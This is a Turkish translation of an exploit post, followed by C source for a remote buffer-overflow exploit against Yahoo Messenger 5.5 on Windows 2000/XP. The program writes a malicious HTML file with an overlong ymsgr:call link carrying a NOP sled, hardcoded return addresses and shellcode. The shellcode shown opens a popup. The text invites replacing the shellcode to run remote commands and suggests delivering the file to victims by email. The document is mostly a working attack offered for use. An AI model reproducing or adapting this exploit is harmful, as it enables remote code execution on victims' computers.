Win2k için Yahoo Messenger 5.5 Exploit
Çeviren : Cyber-Warrior Haberci Grubu (Stroller)
Yahoo Messenger neden bu açigi onarmadi
Bilmiyorum ama ne her iki durumda da aptallar
Bu exploit asagidaki programlarda test edilmistir:
* Yahoo Messenger 5,5,0,1246
* Yahoo Module 5,5,0,454
Windows 2000 Professional 5.0.2195 SP3 içindir.
Ravedtors.net bunun bir Windows versiyonun yayimlamistir.
Exploit Windows XP Pro SP1 içindir
Bu yüzden her iki hedef de XP/2k·ya açiktir. Bazi adreslerin degismesi gerekebilir.
Olusabilecek sorunlar:
Kullanilan adres kutudan kutuya degisiyor olabilir. Bu yüzden degismeleri gerekebilir.
Yigin iskelet kodu adresinin degismesini koruyor olabilir. Alternatifi olmayan, degismeyen bir sektöre ulasacaksiniz.
Iki çakisma var. Birisi bypass. Bu tasinamaz birime tecavüz etmekç Diger çakilma ise tasinmaz birimde oldugumuz aman. Bu yüzden ikincisini karistirmayin.
Burada kullanilan kabuk kod kötü niyetli degilidr. Sadece bir popup açar. Bu kodu degistirebilirsiniz. Ama tampon çok büyük degil. Bu yüzden birlesik kabuk imkani yok.
Bu exploit kurbanda uzaktan verilen komutu çalistirmaya yarar. Yalin olarak mantik URI yönetimidir. Ve kurban kötü html dosyasini görmelidir. Bu otomatik olarak e-posta yoluyla yapilabilir.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define MessageBoxA "\x1d\x97\x53\x01"
char ret[8]= "\xD5\x96\x7A\x01";
unsigned char win32_msgbox[] = {
"\xEB\x19\x5E\x33\xC9\x89\x4E\x05\xB8" MessageBoxA "\x2D\x01\x01"
"\x01\x01\x8B\x18\x6A\x10\x56\x56\x51\xFF\xD3\xE8\xE2\xFF\xFF\xFF"
"\x62\x6f\x62\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
};
int main(int argc,char *argv[])
{
FILE *evil;
char *shellcode = win32_msgbox;
unsigned char buffer[5000];
int offset=320;
fprintf(stdout, "\n\tYahPoo.c By bob.\n");
fprintf(stdout, "Remote Exploit for Yahoo! Messenger 5.5\n");
fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n\n");
fprintf(stdout,"Makin da EbUL HTML File... ");
if ((evil =fopen("yahoo.html","w"))==NULL){
fprintf(stderr,"Failed\n");
exit(1);
} else {
fprintf(stderr,"Opened!\n");
}
memset(buffer,0x00,offset+32+strlen(shellcode));
memset(buffer,0x90,offset);
memcpy(buffer+offset,ret,4);
memcpy(buffer+offset+4,shellcode,strlen(shellcode));
buffer[264] = 0xD4; //address of &shellcode
buffer[265] = 0x96;
buffer[266] = 0x7A;
buffer[267] = 0x01;
buffer[272] = 0xF5; //jmp 0xc [msvcrt.dll]
buffer[273] = 0x01;
buffer[274] = 0x01;
buffer[275] = 0x78;
fprintf(evil,"<html>");
fprintf(evil,"<title>Bought to you by dtors.net!</title>\n");
fprintf(evil,"<B>Dtors Security Research (DSR)</B>\n");
fprintf(evil,"<p>Yahoo Messenger 5.5 exploit....</p>\n");
fprintf(evil,"<pre>");
fprintf(evil,"<a href=%cymsgr:call?%s%c>!EbUL Link!</a></bOdy></pre></html>\x00\x00\x00",0x22,buffer,0x22);
fclose(evil); // <-- closing yahoo.html
fprintf(stdout,"\nDa ebUL HTML file is >>yahoo.html<<\nEnjoy!\nwww.dtors.net\n\n");
}